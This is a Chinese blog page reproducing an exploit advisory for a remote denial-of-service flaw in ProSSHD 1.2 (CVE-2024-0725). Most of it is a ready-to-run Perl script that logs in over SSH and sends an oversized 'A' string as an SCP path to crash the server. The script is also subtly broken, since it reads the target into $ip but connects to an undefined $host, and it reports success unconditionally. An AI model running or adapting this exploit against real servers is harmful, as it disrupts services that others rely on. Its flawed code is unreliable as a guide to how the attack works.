ProSSHD 1.2 20090726 远程拒绝服务(DoS)漏洞利用分析

本文详细分析了ProSSHD 1.2 20090726版本的远程拒绝服务漏洞(CVE-2024-0725),包含完整的Perl利用代码、漏洞触发机制和攻击过程,适用于Windows XP系统环境。

漏洞标题: ProSSHD 1.2 20090726 - 拒绝服务(DoS)

Google搜索关键词: 无

日期: 2024年1月13日

漏洞作者: Fernando Mengali

厂商主页: https://prosshd.com/

软件下载链接: 无

版本: 1.2 20090726

测试环境: Windows XP

CVE编号: CVE-2024-0725

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
$sis="$^O";

if ($sis eq "windows"){
  $cmd="cls";
} else {
  $cmd="clear";
}

system("$cmd");

intro();
main();

print "\t    ==> 正在连接到Web服务器... \n\n";
sleep(1);

my $i=0;
print "\t    ==> 正在利用漏洞... \n\n";

my $payload = "\x41" x 500;

$connection2 = Net::SSH2->new();
$connection2->connect($host, $port) || die "\n错误: 连接被拒绝!\n";
$connection2->auth_password($username, $password) || die "\n错误: 用户名/密码被拒绝!\n";
$scpget = $connection2->scp_get($payload);
$connection2->disconnect();

print "\t    ==> 完成! 漏洞利用成功!";

sub intro {
  print q {
                            ,--,
                     _ ___/ /\|
                 ,;'( )__, )  ~
                //  //   '--; 
                '   \     | ^
                     ^    ^

    [+] ProSSHD 1.2 20090726 - 拒绝服务(DoS)

    [*] 代码作者: Fernando Mengali

    [@] 邮箱: fernando.mengalli@gmail.com
  }
}

sub main {
  our ($ip, $port, $username, $password) = @ARGV;

  unless (defined($ip) && defined($port)) {
    print "\n\t用法: $0 <ip> <端口> <用户名> <密码>           \n";
    exit(-1);
  }
}
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计